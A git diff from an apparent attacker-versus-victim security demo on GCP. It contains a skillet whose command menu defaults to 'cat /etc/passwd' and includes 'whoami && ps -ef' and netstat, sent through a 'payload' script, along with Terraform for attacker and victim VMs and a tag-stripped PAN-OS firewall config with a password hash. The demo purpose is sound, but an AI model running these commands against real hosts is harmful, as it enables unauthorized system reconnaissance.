+  collection: GCP Jenkins Security Framework
+
+# variables define the things an operator may customize in this skillet.
Things like DNS servers, NTP addresses, etc +# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application +variables: + - name: cli + description: Command to Send + default: cat /etc/passwd + type_hint: dropdown + dd_list: + - key: "whoami & ps -ef--- Show who you are logged in as and running processes" + value: "whoami && ps -ef" + - key: "cat /etc/passwd--- show the contents of the passwd file" + value: "cat /etc/passwd" + - key: "netstat -a---- showing active tcp sessions" + value: "netstat -a" + - key: "netstat -tn 2>/dev/null |grep :443--- Show active tcp session on port 443" + value: "netstat -tn 2>/dev/null |grep :443" + - name: manual_cli + description: Manual Command to Send + default: '' + type_hint: text +# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath +# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file +# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined +# in the 'variables' section. +snippets: + - name: payload + file: ../../send_command.py diff --git a/gcp/Jenkins_proj-master/README.md b/gcp/Jenkins_proj-master/README.md new file mode 100644 index 00000000..d76662b1 --- /dev/null +++ b/gcp/Jenkins_proj-master/README.md @@ -0,0 +1,2 @@ +Jenkins_proj +Jenkins Project diff --git a/gcp/Jenkins_proj-master/WebInDeploy/attackers.tf b/gcp/Jenkins_proj-master/WebInDeploy/attackers.tf new file mode 100644 index 00000000..d5efe764 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/attackers.tf @@ -0,0 +1,42 @@ +resource "google_compute_instance" "attacker" { + name = "attacker" + project = "${google_project.attacker_project.id}" + zone = "${var.GCP_Zone}" + machine_type = "n1-standard-1" + allow_stopping_for_update = true + timeouts = { + create = "15m" + delete = "60m" + } + depends_on = [ + "google_storage_bucket_object.config_file_attacker", + "google_project_service.attacker_project" + ] + metadata { + startup-script-url = "gs://${google_storage_bucket.attacker_bucket.name}/initialize_attacker.sh" + serial-port-enable = true + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + "https://www.googleapis.com/auth/compute.readonly", + ] + } + + boot_disk { + initialize_params { + image = "ubuntu-os-cloud/ubuntu-1604-lts" + } + } + + network_interface { + subnetwork = "${google_compute_subnetwork.attacker_subnet.self_link}" + network_ip = "${var.Attacker_IP}" + access_config = {} + } + depends_on = ["google_storage_bucket_object.config_file_attacker"] +} diff --git a/gcp/Jenkins_proj-master/WebInDeploy/bootstrap.tf b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap.tf new file mode 100644 index 00000000..5221c2dc --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap.tf @@ -0,0 +1,47 @@ +resource "google_storage_bucket" "bootstrap_bucket" { + name = "${var.Victim_Project_Name}-${random_id.project_number.hex}" + storage_class = "REGIONAL" + location = "${var.GCP_Region}" + project = "${google_project.victim_project.id}" +} +resource "google_storage_bucket" "attacker_bucket" { + name = "${var.Attacker_Project_Name}-${random_id.project_number.hex}" + storage_class = "REGIONAL" + location = "${var.GCP_Region}" + 
project = "${google_project.attacker_project.id}" +} +resource "google_storage_bucket_object" "config_file_webserver" { + name = "initialize_webserver.sh" + source = "scripts/initialize_webserver.sh" + bucket = "${google_storage_bucket.bootstrap_bucket.name}" +} +resource "google_storage_bucket_object" "config_file_attacker" { + name = "initialize_attacker.sh" + source = "scripts/initialize_attacker.sh" + bucket = "${google_storage_bucket.attacker_bucket.name}" +} +resource "google_storage_bucket_object" "bootstrap" { + name = "config/bootstrap.xml" + source = "bootstrap/bootstrap.xml" + bucket = "${google_storage_bucket.bootstrap_bucket.name}" +} +resource "google_storage_bucket_object" "init_cfg" { + name = "config/init-cfg.txt" + source = "bootstrap/init-cfg.txt" + bucket = "${google_storage_bucket.bootstrap_bucket.name}" +} +resource "google_storage_bucket_object" "content" { + name = "content/null.txt" + source = "bootstrap/null.txt" + bucket = "${google_storage_bucket.bootstrap_bucket.name}" +} +resource "google_storage_bucket_object" "software" { + name = "software/null.txt" + source = "bootstrap/null.txt" + bucket = "${google_storage_bucket.bootstrap_bucket.name}" +} +resource "google_storage_bucket_object" "license" { + name = "license/null.txt" + source = "bootstrap/null.txt" + bucket = "${google_storage_bucket.bootstrap_bucket.name}" +} \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml new file mode 100644 index 00000000..83b66601 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml @@ -0,0 +1,2656 @@ + + + + + + $1$fhfqjgjl$UKU4H9KWTwmKrxropu9BK. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDR3ZDNHZmYk1JbXVSSTlnNGx5SkJRQ0NNSUFjZk0wemVMM2VFM0REdlRkRmYrYzZLOHVJUlRwUk01MHo0TVEwTXd1TEo0Rk1iclQ5ZVRsaEZaZitYcjVBZzJ2R2xIRE9zcEEwSWtmbzZXaTBwYnQ1d1hYV1YwOCs1Tk9GRkpXNm13YThvWUV3RUtHZWlDTEJnRWMyRTgzaXo3alNiNkRST3hXakxDOWVkZmR0ZmNTSzhlNW1kbmRZUkVMK3ZoaSt1QUZac0RpTEhMWGNpeFlaU0xML0xvcmIzK2hnOVdsejQwR0IwMmVsRk1Oc3hJSFdzVUQxMDFVelJzWWFxYWVVWjRuNDlxOVhtc1ZxazVkbHRhcTdtYitWNTZqaVBvVG1wZGNjNjZycGtqWFNjK2NFWGMzaitNbUFRd1F5RkFjbDI2dzlGb3pvUmo4MmY0REx3SncwaEIgamZyYW5rbGluMg== + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + Panorama + 1.2.3.4 + test@yourdomain.com + test@yourdomain.com + + + + + + + + + UDP + 514 + BSD + 1.2.3.4 + LOG_USER + + + + + + + + + Sample_Email_Profile + + (severity eq critical) + Email Critical System Logs + + + All Logs + no + + Sample_Syslog_Profile + + + + + + + + All Logs + no + + Sample_Syslog_Profile + + + + + + + + All Logs + no + + Sample_Syslog_Profile + + + + + + + + All Logs + no + + Sample_Syslog_Profile + + + + + + + + + traffic + All Logs + no + + Sample_Syslog_Profile + + + + threat + All Logs + no + + Sample_Syslog_Profile + + + + + Sample_Email_Profile + + Email Malicious Wildfire Verdicts + wildfire + (verdict eq malicious) + no + + + + Sample_Email_Profile + + Email Phishing Wildfire Verdicts + wildfire + (verdict eq phishing) + no + + + wildfire + All Logs + no + + Sample_Syslog_Profile + + + + url + All Logs + no + + Sample_Syslog_Profile + + + + data + All Logs + no + + Sample_Syslog_Profile + + + + gtp + All Logs + no + + Sample_Syslog_Profile + + + + tunnel + All Logs + no + + Sample_Syslog_Profile + + + + auth + All Logs + no + + 
Sample_Syslog_Profile + + + + + + + + + last-7-calendar-days + 500 + 50 + Host-visit malicious sites plus + daily + (category eq command-and-control) or (category eq hacking) or (category eq malware) or (category eq phishing) + + + repeatcnt + src + + from + srcuser + category + action + + + repeatcnt + + + + + + last-7-calendar-days + 500 + 50 + Hosts visit malicious sites + daily + (category eq command-and-control) or (category eq hacking) or (category eq malware) or (category eq phishing) + + + repeatcnt + src + + from + srcuser + + + repeatcnt + + + + + + last-7-calendar-days + 500 + 50 + Hosts visit questionable sites + daily + (category eq dynamic-dns) and (category eq parked) and (category eq questionable) and (category eq unknown) + + + repeatcnt + src + + from + srcuser + + + repeatcnt + + + + + + last-7-calendar-days + 500 + 50 + Host-visit quest sites plus + daily + (category eq dynamic-dns) and (category eq parked) and (category eq questionable) and (category eq unknown) + Detail of hosts visiting questionable URLs + + + repeatcnt + src + + from + srcuser + category + action + + + repeatcnt + + + + + + last-30-calendar-days + 500 + 10 + Wildfire malicious verdicts + daily + (app neq smtp) and (category neq benign) + Files uploaded or downloaded that were later found to be malicious. This is a summary. Act on real-time email. + + + repeatcnt + + filedigest + container-of-app + app + category + filetype + rule + + + repeatcnt + + + + + + last-30-calendar-days + 500 + 10 + Wildfire verdicts SMTP + daily + (app eq smtp) and (category neq benign) + Links sent from emails found to be malicious. + + + repeatcnt + + filedigest + container-of-app + app + category + filetype + rule + subject + sender + recipient + misc + + + + + + last-30-calendar-days + 500 + 50 + Clients sinkholed + (rule eq 'DNS Sinkhole Block') + daily + + + repeatcnt + from + + src + srcuser + + + repeatcnt + + + + + + + + + + Clients sinkholed + + + Wildfire malicious verdicts + + + Wildfire verdicts SMTP + + + Hosts visit malicious sites + + + Host-visit malicious sites plus + + + Hosts visit questionable sites + + + Host-visit quest sites plus + + + yes + + + Possible Compromise + + + + + + + Possible Compromise + + + + Sample_Email_Profile + + + + + + + + + + + + + + + + + + + + 3 + 5 + wait-recover + + + + + + + + 10000 + 10000 + 40000 + + no + + + + 10000 + 10000 + 40000 + + no + + + + 10000 + 10000 + 40000 + + no + + + + 10000 + 10000 + 40000 + + no + + + + 10000 + 10000 + 40000 + + no + + + + + + + + 2 + 100 + + + + + + 10 + 100 + + + + + + 2 + 100 + + + yes + yes + yes + no + global + + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + + + + + + WebFW1 + UTC + updates.paloaltonetworks.com + yes + + + 8.8.8.8 + 10.0.0.2 + + + Gold 1.0 - PANOS 8.0 + + yes + yes + + + + + + + + + + + yes + no + no + no + + + + + + + 00:00 + download-and-install + + 48 + + + + yes + yes + yes + yes + yes + yes + yes + yes + + + + + 3 + download-and-install + + + + + + + + yes + + + FQDN + + + + yes + no + no + no + + + 
c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDR3ZDNHZmYk1JbXVSSTlnNGx5SkJRQ0NNSUFjZk0wemVMM2VFM0REdlRkRmYrYzZLOHVJUlRwUk01MHo0TVEwTXd1TEo0Rk1iclQ5ZVRsaEZaZitYcjVBZzJ2R2xIRE9zcEEwSWtmbzZXaTBwYnQ1d1hYV1YwOCs1Tk9GRkpXNm13YThvWUV3RUtHZWlDTEJnRWMyRTgzaXo3alNiNkRST3hXakxDOWVkZmR0ZmNTSzhlNW1kbmRZUkVMK3ZoaSt1QUZac0RpTEhMWGNpeFlaU0xML0xvcmIzK2hnOVdsejQwR0IwMmVsRk1Oc3hJSFdzVUQxMDFVelJzWWFxYWVVWjRuNDlxOVhtc1ZxazVkbHRhcTdtYitWNTZqaVBvVG1wZGNjNjZycGtqWFNjK2NFWGMzaitNbUFRd1F5RkFjbDI2dzlGb3pvUmo4MmY0REx3SncwaEIgamZyYW5rbGluMg== + 8.8.8.8 + 8.8.4.4 + + + + yes + yes + + + + + 10 + + + 30 + + + 1000 + + + 2000 + + + 5 + + + 5 + + + 1 + + + 10 + + + 2 + + + yes + yes + + + yes + + + no + + + + + + + + + + + + + + + + ELB-HealthChecker/2.0 + http-req-headers + + + + + + + session + no + + + infrastructure + networking + browser-based + 1 + + + + + tcp/80 + + + + + + + + + + + + + GET + + + GoogleHC/ + http-req-headers + + + + + + + session + no + + + ip-protocol + networking + client-server + 1 + + + + + + + + + + + + allow + no + yes + + + Inbound + + + default + + + deny + no + yes + default + + + + + + + + + + + financial-services + government + health-and-medicine + Custom-No-Decrypt + + + any + + + + + + any + + + any + + + any + + + any + + + any + + Recommended_Decryption_Profile + no-decrypt + yes + This rule does not do Decryption. This rule is validating SSL Protocol Communications. + + + + any + + + any + + + + + + any + + + any + + + any + + + any + + + any + + Recommended_Decryption_Profile + no-decrypt + This rule does not do Decryption. This rule is validating SSL Protocol Communications. + + + + + + + + + + Outbound to the Internet + + + Inbound from the Internet + + + Internal to Internal + + +
+ + 2600:5200::1 + + + 10.0.1.10 + +
+ + + + + + + + http://www.team-cymru.org/Services/Bogons/fullbogons-ipv4.txt + IPv4 addresses that should not be routed across the Internet. Either reserved IP address space or unassigned and may be used for malicious purposes. More information: http://www.team-cymru.com/bogon-reference.html + + + + + + + + + + http://www.team-cymru.org/Services/Bogons/fullbogons-ipv6.txt + IPv6 addresses that should not be routed across the Internet. Either reserved IP address space or unassigned and may be used for malicious purposes. More information: http://www.team-cymru.com/bogon-reference.html + + + + + + + + + + + + + + yes + yes + yes + yes + yes + yes + + + yes + yes + + + no + no + + + yes + yes + + + tls1-2 + no + no + no + no + + + + + + + + + any + + + any + + both + alert + + + + any + + + 7z + bat + chm + class + cpl + dll + hlp + hta + jar + ocx + pif + scr + torrent + vbe + wsf + + both + block + + + + + + + + any + + + any + + both + alert + + + + any + + + 7z + bat + chm + class + cpl + dll + hlp + hta + jar + ocx + pif + scr + torrent + vbe + wsf + + both + block + + + + + + + + any + + + any + + both + alert + + + + any + + + 7z + bat + chm + class + cpl + hlp + hta + jar + ocx + pif + scr + torrent + vbe + wsf + + both + block + + + + + + + + any + + + any + + both + alert + + + + + + + + any + + + any + + both + alert + + + + + + + + + + + + + + + + 72.5.65.111 + 2600:5200::1 + + single-packet + + + + + + + + high + critical + medium + + any + any + single-packet + + + + + + + low + informational + + any + any + disable + + + + + + + + + + + + + + 72.5.65.111 + 2600:5200::1 + + single-packet + + + + + + + + high + critical + medium + + any + any + single-packet + + + + + + + low + informational + + any + any + disable + + + + + + + + + + + + + + 72.5.65.111 + 2600:5200::1 + + single-packet + + + + + + + + high + critical + + any + any + single-packet + + + + + + + low + informational + medium + + any + any + disable + + + + + + + + + + + + + + 2600:5200::1 + + disable + + + + + + + + any + + any + any + disable + + + + + + + + + + + + + + 72.5.65.111 + 2600:5200::1 + + single-packet + + + + + + + + + + + + extended-capture + + pan-sinkhole-default-ip + ::1 + + + + + + + + + any + + any + any + single-packet + + + + + + + + + + + + + + + + + + high + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + White-List + + + yes + yes + yes + block + + abortion + abused-drugs + adult + 
alcohol-and-tobacco + auctions + business-and-economy + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + White-List + + + command-and-control + hacking + malware + phishing + Black-List + + + + + + + + medium + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + + + block + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + + + + + + + + high + + abortion + abused-drugs + adult + alcohol-and-tobacco + 
auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + + + yes + yes + yes + block + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + White-List + + + command-and-control + hacking + malware + phishing + Black-List + + + + + + + + medium + + White-List + + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + 
Custom-No-Decrypt + + + block + yes + yes + yes + no + + White-List + + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + Custom-No-Decrypt + + + + + + + + medium + + Black-List + Custom-No-Decrypt + White-List + + + block + yes + yes + yes + no + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + Custom-No-Decrypt + White-List + + + + + + + + alert + alert + + + alert + alert + + + default + default + + + default + default + + + alert + alert + + + default + default + + + + + + + default + reset-both + + + default + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + default + reset-both + + + reset-both + reset-both + + + + + + + default + reset-both + + + default + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + default + reset-both + + + reset-both + reset-both + + + + + + + default + reset-both + + + default + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + default + reset-both + + + reset-both + reset-both + + + + + + + default + default + + + default + default + + + reset-both + reset-both + + + reset-both + reset-both + + + default + default + + + reset-both + reset-both + + + Use this profile for rules needing modifications to the standard + + + + + drop + drop + + + drop + drop + + + drop + drop + + + 
drop + drop + + + drop + drop + + + drop + drop + + + yes + + + + + + + + + + + any + + + critical + high + medium + + + any + + any + any + any + single-packet + + + + + + + any + + + low + informational + + + any + + any + any + any + disable + + + + + + + + + + + any + + + critical + high + medium + + + any + + any + any + any + single-packet + + + + + + + any + + + low + informational + + + any + + any + any + any + disable + + + + + + + + + + + any + + + critical + high + + + any + + any + any + any + single-packet + + + + + + + any + + + low + informational + medium + + + any + + any + any + any + disable + + + + + + + + + + + any + + + any + + + any + + any + any + any + disable + + + + + + + + + + + + any + + + critical + high + medium + low + + + any + + any + any + any + single-packet + + + + + + + Internal + + + informational + + + any + + any + any + any + disable + + + + + + + any + + + informational + + + any + + any + any + any + extended-capture + + + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + + Outbound-AV + + + Outbound-AS + + + Outbound-VP + + + Outbound-URL + + + Outbound-FB + + + Outbound-WF + + + + + Inbound-AV + + + Inbound-AS + + + Inbound-VP + + + Inbound-FB + + + Inbound-WF + + + + + Internal-AV + + + Internal-AS + + + Internal-VP + + + Internal-FB + + + Internal-WF + + + + + Alert-Only-AV + + + Alert-Only-AS + + + Alert-Only-VP + + + Alert-Only-URL + + + Alert-Only-FB + + + Alert-Only-WF + + + + + + + + + +
+
+
+
+
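The bootstrap.tf file earlier in this diff stages this bootstrap.xml, the init-cfg.txt that follows, and placeholder objects into the storage bucket that firewall.tf hands to the VM-Series through the vmseries-bootstrap-gce-storagebucket metadata key. As a rough post-deployment sanity check, the sketch below lists the four folders the firewall's bootstrap process expects in that bucket; the google-cloud-storage client library, the application-default credentials from the login step, and the example bucket name are assumptions of this sketch, not part of the repository.

# A sketch only: verify that the bootstrap bucket created by bootstrap.tf
# contains the folder layout the VM-Series bootstrap process reads.
# Assumes the google-cloud-storage client library and application-default
# credentials (e.g. from the GCP login step) are available.
from google.cloud import storage

REQUIRED_PREFIXES = ["config/", "content/", "software/", "license/"]


def check_bootstrap_bucket(bucket_name: str) -> None:
    client = storage.Client()
    for prefix in REQUIRED_PREFIXES:
        blobs = list(client.list_blobs(bucket_name, prefix=prefix))
        status = "ok" if blobs else "MISSING"
        print(f"{prefix:<9} {status} ({len(blobs)} object(s))")


# Example call; the bucket name is "<Victim_Project_Name>-<random hex>",
# e.g. "jenkins-1a2b" (hypothetical value for illustration):
# check_bootstrap_bucket("jenkins-1a2b")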
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/init-cfg.txt b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/init-cfg.txt new file mode 100644 index 00000000..04c10233 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/init-cfg.txt @@ -0,0 +1,3 @@ +dns-primary=8.8.8.8 +dns-secondary=8.8.4.4 +op-command-modes=mgmt-interface-swap \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/null.txt b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/null.txt new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/null.txt @@ -0,0 +1 @@ + diff --git a/gcp/Jenkins_proj-master/WebInDeploy/firewall.tf b/gcp/Jenkins_proj-master/WebInDeploy/firewall.tf new file mode 100644 index 00000000..7e1b2cdb --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/firewall.tf @@ -0,0 +1,57 @@ +resource "google_compute_instance" "firewall" { + project = "${google_project.victim_project.id}" + name = "firewall" + machine_type = "n1-standard-4" + zone = "${var.GCP_Zone}" + min_cpu_platform = "Intel Skylake" + can_ip_forward = true + allow_stopping_for_update = true + timeouts = { + create = "15m" + delete = "60m" + } + depends_on = ["google_storage_bucket_object.init_cfg", + "google_storage_bucket_object.bootstrap", + "google_storage_bucket_object.content", + "google_storage_bucket_object.software", + "google_storage_bucket_object.license", + "google_project_service.victim_project" + ] + // Adding METADATA Key Value pairs to VM-Series GCE instance + metadata { + vmseries-bootstrap-gce-storagebucket = "${google_storage_bucket.bootstrap_bucket.name}" + serial-port-enable = true + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] + } + + network_interface { + subnetwork = "${google_compute_subnetwork.untrust_subnet.self_link}" + network_ip = "${var.FW_Untrust_IP}" + access_config = {} + } + + network_interface { + subnetwork = "${google_compute_subnetwork.management_subnet.self_link}" + network_ip = "${var.FW_Mgmt_IP}" + access_config = {} + } + + network_interface { + subnetwork = "${google_compute_subnetwork.trust_subnet.self_link}" + network_ip = "${var.FW_Trust_IP}" + } + + boot_disk { + initialize_params { + image = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle2-814" + } + } +} diff --git a/gcp/Jenkins_proj-master/WebInDeploy/gcp_firewall.tf b/gcp/Jenkins_proj-master/WebInDeploy/gcp_firewall.tf new file mode 100644 index 00000000..382aaade --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/gcp_firewall.tf @@ -0,0 +1,34 @@ +resource "google_compute_firewall" "management" { + name = "management-firewall" + project = "${google_project.victim_project.id}" + network = "${google_compute_network.management_network.name}" + allow { + protocol = "tcp" + ports = ["22", "443"] + } +} +resource "google_compute_firewall" "untrust" { + name = "untrust-firewall" + project = "${google_project.victim_project.id}" + network = "${google_compute_network.untrust_network.name}" + allow { + protocol = "tcp" + } +} +resource "google_compute_firewall" "trust" { + name = "trust-firewall" + project = "${google_project.victim_project.id}" + network = "${google_compute_network.trust_network.name}" + allow { + protocol = "tcp" + } +} +resource 
